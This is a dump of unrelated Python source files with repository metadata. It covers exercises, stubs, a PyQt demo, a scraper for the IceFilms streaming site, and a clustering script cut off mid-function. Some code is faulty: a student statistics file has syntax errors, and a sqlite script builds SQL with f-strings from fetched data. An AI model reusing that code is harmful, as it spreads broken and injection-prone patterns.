be4034b96252307d6e130988d30401bb65314765
|
d7f4596491b47d74689d8731c9d0f10b51b5693f
|
/fastcampus/코딩테스트_면접/02. 알고리즘 이론/graph.py
|
6b593b8ff449f75e4ad3cf2229502620e69e8a70
|
[] |
no_license
|
wonjongah/DataStructure_CodingTest
|
797b62d48321abf065f1507f14a3ed0902f48399
|
9d28c2aefbba2486f6158c066fd249fca3904346
|
refs/heads/main
| 2023-06-04T15:54:30.048106
| 2021-06-30T14:09:41
| 2021-06-30T14:09:41
| 327,008,361
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 259
|
py
|
graph = dict()
graph['A'] = ['B', 'C']
graph['B'] = ['A', 'D']
graph['C'] = ['A', 'G', 'H', 'I']
graph['D'] = ['B', 'E', 'F']
graph['E'] = ['D']
graph['F'] = ['D']
graph['G'] = ['C']
graph['H'] = ['C']
graph['I'] = ['C', 'J']
graph['J'] = ['I']
print(graph)
|
[
"wonjongah@gmail.com"
] |
wonjongah@gmail.com
|
59fedb17f8722439c3814f478d134f626b0a4c4a
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/48/usersdata/82/15966/submittedfiles/estatistica.py
|
31ad4a0026cf93a6236f0ea7646c0afd92d24f53
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146
| 2017-12-22T16:05:45
| 2017-12-22T16:05:45
| 69,566,344
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 794
|
py
|
# -*- coding: utf-8 -*-
from __future__ import division
def media(lista):
soma = 0
for i in range(0,len(lista),1):
soma = soma + lista[i]
media = soma/len(lista)
return media
a=[]
b=[]
n= input ('Digite a quantidade de elementos:')
for i in range (0,n,1):
a.append(input('Digite um elemento:'))
for i in range (0,n,1):
b.append(input('Digite um elemento:'))
media_a = media(a)
media_b = media(b)
print('%.2f' %media_a)
print('%.2f' %media_b)
#Por último escreva o programa principal, que pede a entrada e chama as funções criadas.
def desviopadrao(lista):
soma=0
for j in range (0,n,1):
soma=soma+(l[j]-media)**2
s=((1/(n-1))*soma)**(1/2)
print('%.2f' %media_a)
print('%2.f' desviopadrao_a)
print('%.2f' %media_b)
print('%2.f' %desviopadrao_b)
|
[
"rafael.mota@ufca.edu.br"
] |
rafael.mota@ufca.edu.br
|
5941ae15de8d50faefafcad8fed4e9d17d948e27
|
c7a6f8ed434c86b4cdae9c6144b9dd557e594f78
|
/ECE364/.PyCharm40/system/python_stubs/348993582/gtk/_gtk/MountOperation.py
|
d327e51af64f413a5022e8715f458a73a8e61d5b
|
[] |
no_license
|
ArbalestV/Purdue-Coursework
|
75d979bbe72106975812b1d46b7d854e16e8e15e
|
ee7f86145edb41c17aefcd442fa42353a9e1b5d1
|
refs/heads/master
| 2020-08-29T05:27:52.342264
| 2018-04-03T17:59:01
| 2018-04-03T17:59:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,919
|
py
|
# encoding: utf-8
# module gtk._gtk
# from /usr/lib64/python2.6/site-packages/gtk-2.0/gtk/_gtk.so
# by generator 1.136
# no doc
# imports
import atk as __atk
import gio as __gio
import gobject as __gobject
import gobject._gobject as __gobject__gobject
class MountOperation(__gio.MountOperation):
"""
Object GtkMountOperation
Properties from GtkMountOperation:
parent -> GtkWindow: Parent
The parent window
is-showing -> gboolean: Is Showing
Are we showing a dialog
screen -> GdkScreen: Screen
The screen where this window will be displayed.
Signals from GMountOperation:
ask-password (gchararray, gchararray, gchararray, GAskPasswordFlags)
ask-question (gchararray, GStrv)
reply (GMountOperationResult)
aborted ()
show-processes (gchararray, GArray, GStrv)
Properties from GMountOperation:
username -> gchararray: Username
The user name
password -> gchararray: Password
The password
anonymous -> gboolean: Anonymous
Whether to use an anonymous user
domain -> gchararray: Domain
The domain of the mount operation
password-save -> GPasswordSave: Password save
How passwords should be saved
choice -> gint: Choice
The users choice
Signals from GObject:
notify (GParam)
"""
def get_parent(self, *args, **kwargs): # real signature unknown
pass
def get_screen(self, *args, **kwargs): # real signature unknown
pass
def is_showing(self, *args, **kwargs): # real signature unknown
pass
def set_parent(self, *args, **kwargs): # real signature unknown
pass
def set_screen(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
__gtype__ = None # (!) real value is ''
|
[
"pkalita@princeton.edu"
] |
pkalita@princeton.edu
|
e260d0d50c7d74e84cf1062a5c25ccbe38c4e375
|
90360a1de1c19ab217ff0fceaaa3140cad4ddaa5
|
/plugin.video.salts/scrapers/icefilms_scraper.py
|
9fffbf94a63ac44d5c3ce8d39de54d0ed860f31e
|
[] |
no_license
|
trickaz/tknorris-beta-repo
|
934cbbf089e12607fe991d13977f0d8a61354f01
|
c4b82ef1b402514ef661bcc669852c44578fcaa0
|
refs/heads/master
| 2021-01-22T14:25:19.271493
| 2014-10-17T06:19:39
| 2014-10-17T06:19:39
| 25,358,146
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,462
|
py
|
"""
SALTS XBMC Addon
Copyright (C) 2014 tknorris
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import scraper
import re
import urllib
import urlparse
import HTMLParser
import string
import xbmcaddon
from salts_lib.db_utils import DB_Connection
from salts_lib import log_utils
from salts_lib.constants import VIDEO_TYPES
from salts_lib.constants import QUALITIES
QUALITY_MAP = {'HD 720P': QUALITIES.HD, 'DVDRIP / STANDARD DEF': QUALITIES.HIGH}
#BROKEN_RESOLVERS = ['180UPLOAD', 'HUGEFILES', 'VIDPLAY']
BROKEN_RESOLVERS = []
BASE_URL='http://www.icefilms.info'
class IceFilms_Scraper(scraper.Scraper):
base_url=BASE_URL
def __init__(self, timeout=scraper.DEFAULT_TIMEOUT):
self.timeout=timeout
self.db_connection = DB_Connection()
self.base_url = xbmcaddon.Addon().getSetting('%s-base_url' % (self.get_name()))
@classmethod
def provides(cls):
return frozenset([VIDEO_TYPES.TVSHOW, VIDEO_TYPES.SEASON, VIDEO_TYPES.EPISODE, VIDEO_TYPES.MOVIE])
@classmethod
def get_name(cls):
return 'IceFilms'
def resolve_link(self, link):
url, query = link.split('?', 1)
data = urlparse.parse_qs(query, True)
url = urlparse.urljoin(self.base_url, url)
html = self._http_get(url, data=data, cache_limit=0)
match = re.search('url=(.*)', html)
if match:
url=urllib.unquote_plus(match.group(1))
if url.upper() in BROKEN_RESOLVERS:
url = None
return url
def format_source_label(self, item):
label='[%s] %s%s (%s/100) ' % (item['quality'], item['label'], item['host'], item['rating'])
return label
def get_sources(self, video):
source_url=self.get_url(video)
sources = []
if source_url:
try:
url = urlparse.urljoin(self.base_url, source_url)
html = self._http_get(url, cache_limit=.5)
pattern='<iframe id="videoframe" src="([^"]+)'
match = re.search(pattern, html)
frame_url = match.group(1)
url = urlparse.urljoin(self.base_url, frame_url)
html = self._http_get(url, cache_limit=.5)
match=re.search('lastChild\.value="([^"]+)"', html)
secret=match.group(1)
match=re.search('"&t=([^"]+)', html)
t=match.group(1)
pattern='<div class=ripdiv>(.*?)</div>'
for container in re.finditer(pattern, html):
fragment=container.group(0)
match=re.match('<div class=ripdiv><b>(.*?)</b>', fragment)
if match:
quality=QUALITY_MAP[match.group(1).upper()]
else:
quality=None
pattern='onclick=\'go\((\d+)\)\'>([^<]+)(<span.*?)</a>'
for match in re.finditer(pattern, fragment):
link_id, label, host_fragment = match.groups()
source = {'multi-part': False, 'quality': quality, 'class': self, 'label': label, 'rating': None, 'views': None, 'direct': False}
host=re.sub('(<[^>]+>|</span>)','',host_fragment)
source['host']=host.lower()
if host.upper() in BROKEN_RESOLVERS:
continue
url = '/membersonly/components/com_iceplayer/video.phpAjaxResp.php?id=%s&s=999&iqs=&url=&m=-999&cap=&sec=%s&t=%s' % (link_id, secret, t)
source['url']=url
sources.append(source)
except Exception as e:
log_utils.log('Failure (%s) during icefilms get sources: |%s|' % (str(e), video))
return sources
def get_url(self, video):
return super(IceFilms_Scraper, self)._default_get_url(video)
def search(self, video_type, title, year):
if video_type==VIDEO_TYPES.MOVIE:
url = urlparse.urljoin(self.base_url, '/movies/a-z/')
else:
url = urlparse.urljoin(self.base_url,'/tv/a-z/')
if title.upper().startswith('THE '):
first_letter=title[4:5]
elif title.upper().startswith('A '):
first_letter = title[2:3]
elif title[:1] in string.digits:
first_letter='1'
else:
first_letter=title[:1]
url = url + first_letter.upper()
html = self._http_get(url, cache_limit=.25)
h = HTMLParser.HTMLParser()
html = unicode(html, 'windows-1252')
html = h.unescape(html)
norm_title = self._normalize_title(title)
pattern = 'class=star.*?href=([^>]+)>(.*?)(?:\s*\((\d+)\))?</a>'
results=[]
for match in re.finditer(pattern, html, re.DOTALL):
url, match_title, match_year = match.groups('')
if norm_title in self._normalize_title(match_title) and (not year or not match_year or year == match_year):
result={'url': url, 'title': match_title, 'year': match_year}
results.append(result)
return results
def _get_episode_url(self, show_url, video):
episode_pattern = 'href=(/ip\.php[^>]+)>%sx0?%s\s+' % (video.season, video.episode)
title_pattern='class=star>\s*<a href=([^>]+)>(?:\d+x\d+\s+)+([^<]+)'
return super(IceFilms_Scraper, self)._default_get_episode_url(show_url, video, episode_pattern, title_pattern)
def _http_get(self, url, data=None, cache_limit=8):
return super(IceFilms_Scraper, self)._cached_http_get(url, self.base_url, self.timeout, data=data, cache_limit=cache_limit)
|
[
"tknorris@gmail.com"
] |
tknorris@gmail.com
|
1c9798c3ad320b1268eb7c05f3413c11de8cc2c4
|
74d6b36ae48a2153fa35c56d2448c05b64c72bf8
|
/contests/550/A-two-substrings.py
|
1cd1bdb89a05efe3c401c3f0559cc701f7386b67
|
[] |
no_license
|
hariharanragothaman/codeforces-solutions
|
205ec8b717e8eb3e4d700fc413159c49a582cff6
|
1566a9187cc16e1461ddb55dbcc393493604dfcd
|
refs/heads/master
| 2023-06-24T11:33:52.255437
| 2021-07-25T14:33:52
| 2021-07-25T14:33:52
| 282,783,158
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,935
|
py
|
"""
Given a string, we need to find , if it contains AB, and BA seperately and they are non-overlapping
The strings can be in any order.
"""
from typing import List
p = 31
m = 10 ** 9 + 9
def compute_hash(s):
n = len(s)
power_mod = [1]
for i in range(n):
power_mod.append((power_mod[-1] * p) % m)
hash_values = [0] * (n + 1)
for i in range(n):
hash_values[i + 1] = (
hash_values[i] + (ord(s[i]) - ord("a") + 1) * power_mod[i]
) % m
def count_occurences(text, pattern):
"""
:param pattern: Pattern Text
:param text: I/P text
:return:
"""
text_length = len(text)
pattern_length = len(pattern)
power_mod = [1]
for i in range(text_length):
power_mod.append((power_mod[-1] * p) % m)
# print(f"The power mod is: {[power_mod]}")
hash_values = [0] * (text_length + 1)
for i in range(text_length):
hash_values[i + 1] = (
hash_values[i] + (ord(text[i]) - ord("a") + 1) * power_mod[i]
) % m
# print("The string hash values are:", hash_values)
pattern_hash = 0
for i in range(pattern_length):
pattern_hash += ((ord(pattern[i]) - ord("a") + 1) * power_mod[i]) % m
# print("The pattern hash is:", pattern_hash)
occurences = []
i = 0
while i + pattern_length - 1 < text_length:
field_hash = (hash_values[i + pattern_length] - hash_values[i] + m) % m
if field_hash == pattern_hash * power_mod[i] % m:
occurences.append(i)
i += 1
return occurences
def solve(s):
"""
AB and BA are defined strings of length 2
We can do rabin-karp, to get this.
So find where all AB is - ab_result
find where all BA is - ba_result
AB, BA occurence - ensure it's not overalling
:return:
"""
# Let's try a bruteforce method first - This will TLE
def helper(s, char) -> List:
n = len(s)
res = []
start = 0
while s:
idx = s.find(char, start, n)
if idx != -1:
res.append(idx)
start += 2
elif idx == -1:
break
return res
# result1 = helper(s, char='AB')
# result2 = helper(s, char='BA')
result1 = count_occurences(s, pattern="AB")
result2 = count_occurences(s, pattern="BA")
# We now have to basically find if we can find 2 non-overalapping intervals
a = []
b = []
if result1 and result2:
if result1[0] < result2[0]:
a, b = result1, result2
else:
a, b = result2, result1
for i, val1 in enumerate(a):
for j, val2 in enumerate(b):
if abs(val1 - val2) >= 2:
return True
return False
else:
return False
if __name__ == "__main__":
s = input()
res = solve(s)
if res:
print("YES")
else:
print("NO")
|
[
"hariharanragothaman@gmail.com"
] |
hariharanragothaman@gmail.com
|
fc6ec366cc16a9f609e3910d19770d58645a59b8
|
eb3683f9127befb9ef96d8eb801206cf7b84d6a7
|
/stypy/invokation/type_rules/modules/numpy/lib/ufunclike/ufunclike__type_modifiers.py
|
8a0fa8e78c44a7d76c174b17b2107251eb822674
|
[] |
no_license
|
ComputationalReflection/stypy
|
61ec27333a12f76ac055d13f8969d3e0de172f88
|
be66ae846c82ac40ba7b48f9880d6e3990681a5b
|
refs/heads/master
| 2021-05-13T18:24:29.005894
| 2018-06-14T15:42:50
| 2018-06-14T15:42:50
| 116,855,812
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 373
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import numpy
from stypy.invokation.handlers import call_utilities
class TypeModifiers:
@staticmethod
def fix(localization, proxy_obj, arguments):
if call_utilities.is_numpy_array(arguments[0]):
return arguments[0]
else:
return call_utilities.create_numpy_array(arguments[0])
|
[
"redondojose@uniovi.es"
] |
redondojose@uniovi.es
|
dbf30296d71e7bf60831a0c340e730a93a7d7a5c
|
c78d25a2ea56f012da3381d7245c3e08556129e1
|
/coherence/backends/radiotime_storage.py
|
1f2c5d69ba48ac3beee20a08759cb96b1a85c6c1
|
[
"MIT"
] |
permissive
|
Python3pkg/Cohen
|
556ad3952136fc2eafda99202a7280c2ece2477e
|
14e1e9f5b4a5460033692b30fa90352320bb7a4e
|
refs/heads/master
| 2021-01-21T17:13:58.602576
| 2017-05-21T08:33:16
| 2017-05-21T08:33:16
| 91,943,281
| 1
| 0
| null | 2017-05-21T08:32:55
| 2017-05-21T08:32:55
| null |
UTF-8
|
Python
| false
| false
| 7,113
|
py
|
# Licensed under the MIT license
# http://opensource.org/licenses/mit-license.php
# an internet radio media server for the Coherence UPnP Framework
# based on the radiotime (http://radiotime.com) catalog service
# Copyright 2007, Frank Scholz <coherence@beebits.net>
# Copyright 2009-2010, Jean-Michel Sizun <jmDOTsizunATfreeDOTfr>
from lxml import etree
from twisted.python.failure import Failure
from coherence.upnp.core import utils
from coherence.upnp.core import DIDLLite
from coherence.upnp.core.DIDLLite import Resource
from coherence.backend import BackendItem, Container, LazyContainer, AbstractBackendStore
OPML_BROWSE_URL = 'http://opml.radiotime.com/Browse.ashx'
# we only handle mp3 audio streams for now
DEFAULT_FORMAT = "mp3"
DEFAULT_MIMETYPE = "audio/mpeg"
# TODO : extend format handling using radiotime API
class RadiotimeAudioItem(BackendItem):
logCategory = 'radiotime'
def __init__(self, outline):
BackendItem.__init__(self)
self.preset_id = outline.get('preset_id')
self.name = outline.get('text')
self.mimetype = DEFAULT_MIMETYPE
self.stream_url = outline.get('URL')
self.image = outline.get('image')
#self.location = PlaylistStreamProxy(self.stream_url)
#self.url = self.stream_url
self.item = None
def replace_by (self, item):
# do nothing: we suppose the replacement item is the same
return
def get_item(self):
if self.item == None:
upnp_id = self.get_id()
upnp_parent_id = self.parent.get_id()
self.item = DIDLLite.AudioBroadcast(upnp_id, upnp_parent_id, self.name)
self.item.albumArtURI = self.image
res = Resource(self.stream_url, 'http-get:*:%s:%s' % (self.mimetype,
';'.join(('DLNA.ORG_PN=MP3',
'DLNA.ORG_CI=0',
'DLNA.ORG_OP=01',
'DLNA.ORG_FLAGS=01700000000000000000000000000000'))))
res.size = 0 # None
self.item.res.append(res)
return self.item
def get_path(self):
return self.url
def get_id(self):
return self.storage_id
class RadiotimeStore(AbstractBackendStore):
logCategory = 'radiotime'
implements = ['MediaServer']
def __init__(self, server, **kwargs):
AbstractBackendStore.__init__(self, server, **kwargs)
self.name = kwargs.get('name', 'radiotimeStore')
self.refresh = int(kwargs.get('refresh', 60)) * 60
self.browse_url = self.config.get('browse_url', OPML_BROWSE_URL)
self.partner_id = self.config.get('partner_id', 'TMe3Cn6v')
self.username = self.config.get('username', None)
self.locale = self.config.get('locale', 'en')
self.serial = server.uuid
# construct URL for root menu
if self.username is not None:
identification_param = "username=%s" % self.username
else:
identification_param = "serial=%s" % self.serial
formats_value = DEFAULT_FORMAT
root_url = "%s?partnerId=%s&%s&formats=%s&locale=%s" % (self.browse_url, self.partner_id, identification_param, formats_value, self.locale)
# set root item
root_item = LazyContainer(None, "root", "root", self.refresh, self.retrieveItemsForOPML, url=root_url)
self.set_root_item(root_item)
self.init_completed()
def upnp_init(self):
self.current_connection_id = None
self.wmc_mapping = {'4': self.get_root_id()}
if self.server:
self.server.connection_manager_server.set_variable(0, 'SourceProtocolInfo',
['http-get:*:audio/mpeg:*',
'http-get:*:audio/x-scpls:*'],
default=True)
def retrieveItemsForOPML (self, parent, url):
def append_outline(parent, outline):
type = outline.get('type')
if type is None:
# This outline is just a classification item containing other outline elements
# the corresponding item will a static Container
text = outline.get('text')
key = outline.get('key')
external_id = None
if external_id is None and key is not None:
external_id = "%s_%s" % (parent.external_id, key)
if external_id is None:
external_id = outline_url
item = Container(parent, text)
item.external_id = external_id
item.store = parent.store
parent.add_child(item, external_id=external_id)
sub_outlines = outline.findall('outline')
for sub_outline in sub_outlines:
append_outline(item, sub_outline)
elif type == 'link':
# the corresponding item will a self-populating Container
text = outline.get('text')
outline_url = outline.get('URL')
key = outline.get('key')
guide_id = outline.get('guide_id')
external_id = guide_id
if external_id is None and key is not None:
external_id = "%s_%s" % (parent.external_id, key)
if external_id is None:
external_id = outline_url
item = LazyContainer(parent, text, external_id, self.refresh, self.retrieveItemsForOPML, url=outline_url)
parent.add_child(item, external_id=external_id)
elif type == 'audio':
item = RadiotimeAudioItem(outline)
parent.add_child(item, external_id=item.preset_id)
def got_page(result):
self.info('connection to Radiotime service successful for url %s', url)
outlines = result.findall('body/outline')
for outline in outlines:
append_outline(parent, outline)
return True
def got_error(error):
self.warning("connection to Radiotime service failed for url %s", url)
self.debug("%r", error.getTraceback())
parent.childrenRetrievingNeeded = True # we retry
return Failure("Unable to retrieve items for url %s" % url)
def got_xml_error(error):
self.warning("Data received from Radiotime service is invalid: %s", url)
#self.debug("%r", error.getTraceback())
print(error.getTraceback())
parent.childrenRetrievingNeeded = True # we retry
return Failure("Unable to retrieve items for url %s" % url)
d = utils.getPage(url, )
d.addCallback(etree.fromstring)
d.addErrback(got_error)
d.addCallback(got_page)
d.addErrback(got_xml_error)
return d
|
[
"raliclo@gmail.com"
] |
raliclo@gmail.com
|
630bdd5c13f4ec241b016ee6636bfe70af9b1448
|
01822d2ae38a95edcd188a51c377bb07b0a0c57d
|
/Assignments/Sprint3/FindAllPaths.py
|
faf38a0af57c11891b1ec51c5c26b3865f784c23
|
[
"MIT"
] |
permissive
|
mark-morelos/CS_Notes
|
bc298137971295023e5e3caf964fe7d3f8cf1af9
|
339c47ae5d7e678b7ac98d6d78857d016c611e38
|
refs/heads/main
| 2023-03-10T11:56:52.691282
| 2021-03-02T15:09:31
| 2021-03-02T15:09:31
| 338,211,631
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,496
|
py
|
"""
Understand
Note: For some reason, it's failing one of the tests. I
think it's because the test case didn't sort their output.
In that case, the test is wrong :)
Drawing graphs via text are a pain, so I'm just gonna use the example given
Plan
1. Translate the problem into graph terminology
- Each index in the list given is a node
- Each subarray are the node's outgoing edges to its neighbors
2. Build your graph
- The graph is actually already built for us. We can traverse
the given list like a graph since
we have access to the node we're at and its neighbors.
3. Traverse the graph
- Any type of traversal would work, we just need to keep
track of the path that we've currently taken
- We add that path to the result once we reach the destination node
- Note that we don't need a visited set since we're
guaranteed that the graph is a DAG
Runtime: O(number of nodes^2)
Space: O(number of nodes^2)
Imagine a dense graph
"""
from collections import deque
def csFindAllPathsFromAToB(graph):
stack = deque()
stack.append((0, [0]))
res = []
destinationNode = len(graph) - 1
while len(stack) > 0:
curr = stack.pop()
currNode, currPath = curr[0], curr[1]
for neighbor in graph[currNode]:
newPath = currPath.copy()
newPath.append(neighbor)
if neighbor == destinationNode:
res.append(newPath)
else:
stack.append((neighbor, newPath))
res.sort()
return res
|
[
"makoimorelos@gmail.com"
] |
makoimorelos@gmail.com
|
d99058ae8efde20b0b9a94917310bf9294bf3d79
|
3d4094d6eca69329d4c6ba08e0c8ce79eedeb6b6
|
/starter/While.py
|
af86daef2ae3d6572815e944274601b1454dd277
|
[] |
no_license
|
agkozik/Python_Course
|
c9f3c8b68e60b452e57f43da7554c13daf386a0c
|
4b095bbc86f33999efe95127528b3e1d8bfded9f
|
refs/heads/master
| 2022-04-27T06:04:15.276472
| 2020-04-22T11:49:06
| 2020-04-22T11:49:06
| 255,082,012
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,286
|
py
|
# # ---------------------- while true ----------------------------
#
# message = ""
# while message != "exit":
# message = input("Type exit to exit: ")
#
# # ---------------------- while int true ----------------------------
# n = 1
# while n <= 3:
# print("n = ", n)
# n += 1
#
# # ---------------------- while enter a positive number --------
# number = 0
# while number <= 0:
# number = int(input("Enter a positive number: "))
# print("Your number is ", number)
# # ---------------------- Break --------------------------------
# i = 1
# while True:
# print("Iterataion ", i)
# i += 1
# if i == 10:
# break
# print("Loop has stopped")
# # ---------------------- Continue -----------------------------
# n = 0
# while n < 10:
# n += 1;
# if n == 5:
# print("Value 5 skipped because of continue operator")
# continue
# print(n)
# # ---------------------- While with Else ----------------------------
attempts_left = 3
while attempts_left > 0:
attempts_left -= 1
password = input("Please, enter Password ["
"you have {} attempt(s) ]: ".format(attempts_left + 1))
if password == '1234':
print("Correct password, signing...")
break
else:
print("You lost all attempts.")
|
[
"agkozik@gmail.com"
] |
agkozik@gmail.com
|
6c7d9885d0519d18a161ee398e1f83753b821006
|
65a32b8a8a97c126843d2cfe79c43193ac2abc23
|
/chapter9/local_var.py
|
1816492d4b38b735cc5262f0aabbb32c1c380b9e
|
[] |
no_license
|
zhuyuedlut/advanced_programming
|
9af2d6144e247168e492ddfb9af5d4a5667227c4
|
a6e0456dd0b216b96829b5c3cef11df706525867
|
refs/heads/master
| 2023-03-19T09:21:31.234000
| 2020-10-09T13:09:38
| 2020-10-09T13:09:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 809
|
py
|
a = 20
exec('b = a + 1')
print(f'b = {b}')
# def test():
# a = 20
# exec('b = a + 1')
# print(f'b = {b}')
#
# test()
def test():
a = 20
loc = locals()
exec('b = a + 1')
b = loc['b']
print(f't: b = {b}')
test()
def test_1():
x = 0
exec('x += 1')
print(f't1: x = {x}')
test_1()
def test_2():
x = 0
loc = locals()
print(f't2 before: {loc}')
exec('x += 1')
print(f't2 after: {loc}')
print(f't2: x = {x}')
test_2()
def test_3():
x = 0
loc = locals()
print(f't3: loc = {loc}')
exec('x += 1')
print(f't3: loc = {loc}')
locals()
print(f't3: loc = {loc}')
test_3()
def test_4():
a = 20
loc = {'a': a}
glb = {}
exec('b = a + 1', glb, loc)
b = loc['b']
print(f't4: b = {b}')
test_4()
|
[
"root@lyzdeMacBook.local"
] |
root@lyzdeMacBook.local
|
46bb827c374c723df2920b4765f45cafad5d8454
|
50402cc4388dfee3a9dbe9e121ef217759ebdba8
|
/demo/testPyQt/test3.py
|
6c42882d89fc51c0eae08cdf2e7c23b542794f04
|
[] |
no_license
|
dqyi11/SVNBackup
|
bd46a69ec55e3a4f981a9bca4c8340944d8d5886
|
9ad38e38453ef8539011cf4d9a9c0a363e668759
|
refs/heads/master
| 2020-03-26T12:15:01.155873
| 2015-12-10T01:11:36
| 2015-12-10T01:11:36
| 144,883,382
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 928
|
py
|
'''
Created on Apr 22, 2014
@author: walter
'''
import sys
from PyQt4 import QtGui
class Example(QtGui.QMainWindow):
def __init__(self):
super(Example, self).__init__()
self.initUI()
def initUI(self):
exitAction = QtGui.QAction(QtGui.QIcon('exit.png'), '&Exit', self)
exitAction.setShortcut('Ctrl+Q')
exitAction.setStatusTip('Exit application')
exitAction.triggered.connect(QtGui.qApp.quit)
self.statusBar()
menubar = self.menuBar()
fileMenu = menubar.addMenu('&File')
fileMenu.addAction(exitAction)
self.setGeometry(300, 300, 300, 200)
self.setWindowTitle('Menubar')
self.show()
def main():
app = QtGui.QApplication(sys.argv)
ex = Example()
sys.exit(app.exec_())
if __name__ == '__main__':
main()
|
[
"walter@e224401c-0ce2-47f2-81f6-2da1fe30fd39"
] |
walter@e224401c-0ce2-47f2-81f6-2da1fe30fd39
|
c9ca634b1cfd0a70676f197430bc0680ce1077d0
|
8928c4745515ffecfc581da36df47b0789fb463f
|
/Chapter_9/formsub.py
|
51ea5e0fe04bad40167a6fc40016825b997f0e1d
|
[] |
no_license
|
iluxonchik/webscraping-with-python-book
|
72da36ba8fae016ccc20d44753ec4c46bc933dee
|
ffc5a1459778649d081c62812c8d3edbb2f120a9
|
refs/heads/master
| 2021-01-10T10:19:12.443341
| 2016-01-21T21:50:11
| 2016-01-21T21:50:11
| 48,058,040
| 1
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 302
|
py
|
import requests
params = {'firstname':'hello', 'lastname':'there'}
r = requests.post("http://pythonscraping.com/files/processing.php", data=params)
print(r.text)
files = {'uploadFile': open('1.png', 'rb')}
r = requests.post("http://pythonscraping.com/files/processing2.php", files=files)
print(r.text)
|
[
"iluxon4ik@hotmail.com"
] |
iluxon4ik@hotmail.com
|
e7df1ffbd062f8f616fff956e0482311a709c86a
|
e4d4149a717d08979953983fa78fea46df63d13d
|
/Week6/Day5/DailyChallenge.py
|
68788690cf6a298238eff2f8a5648c48d64c3f7a
|
[] |
no_license
|
fayblash/DI_Bootcamp
|
72fd75497a2484d19c779775c49e4306e602d10f
|
a4e8f62e338df5d5671fd088afa575ea2e290837
|
refs/heads/main
| 2023-05-05T20:55:31.513558
| 2021-05-27T06:48:40
| 2021-05-27T06:48:40
| 354,818,813
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 615
|
py
|
import sqlite3 as sl
from time import time
import requests
import json
connection=sl.connect("countries.db")
cursor=connection.cursor()
start=time()
for i in range(10,21):
data=requests.get("https://restcountries.eu/rest/v2/all")
country=data.json()
print (country[i]['name'])
query=f"INSERT INTO countries(name,capital,flag,subregion,population) VALUES ('{country[i]['name']}','{country[i]['capital']}','{country[i]['flag']}','{country[i]['subregion']}','{country[i]['population']}')"
cursor.execute(query)
connection.commit()
connection.close()
end=time()
print(end-start)
|
[
"fayblash@gmail.com"
] |
fayblash@gmail.com
|
277ca5faf223fee0254b99c950487e402e63cb75
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/nouns/_untruth.py
|
f82b360189c64e1e50c3124e3fe683bea2162f45
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 354
|
py
|
#calss header
class _UNTRUTH():
def __init__(self,):
self.name = "UNTRUTH"
self.definitions = [u'a statement that is not true: ', u'the fact that something is not true: ']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
97698fdcf4861c65a25ec9893aa57e5b52a06063
|
b6b2be9866fd16699ad5c30a21bbcb70755f1e57
|
/Experiments/_Legacy/Chicago/PartitionByDocThenClusterUsingLsa.py
|
6e174934f81ca58b1b992fbc3c3f4391ac23815f
|
[] |
no_license
|
simonhughes22/PythonNlpResearch
|
24a482c7036c568b063ec099176b393d45a0a86b
|
2bc2914ce93fcef6dbd26f8097eec20b7d0e476d
|
refs/heads/master
| 2022-12-08T17:39:18.332177
| 2019-10-26T12:48:33
| 2019-10-26T12:48:33
| 16,458,105
| 17
| 7
| null | 2022-12-07T23:38:17
| 2014-02-02T16:36:39
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 4,135
|
py
|
import Clusterer
import ClustersToFile
import SentenceData
import ListHelper
import Lsa
import MatrixHelper
import TfIdf
import WordTokenizer
import logging
import PartitionByCode
import CosineSimilarity
import collections
def find_closest_document(txtMatrixByCode, row):
""" Takes a dictionary of codes to LSA matrices (one per document)
and returns the key for the closest doc based on the mean
cosine similarity (could also use max...)
"""
if len(row) == 0:
return "ERROR"
means_per_code = {}
for doc in txtMatrixByCode.keys():
distance_matrix = txtMatrixByCode[doc]
total = 0.0
for row_to_test in distance_matrix:
sim = CosineSimilarity.cosine_similarity(row, row_to_test)
total += sim
means_per_code[doc] = total / len(distance_matrix)
# first row, first tuple (key)
return sorted(means_per_code.items(), key = lambda item: item[1], reverse = True)[0][0]
def train(num_lsa_topics, k):
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
#TOKENIZE
xs = SentenceData.SentenceData()
tokenizer = WordTokenizer.WordTokenizer(min_word_count = 5)
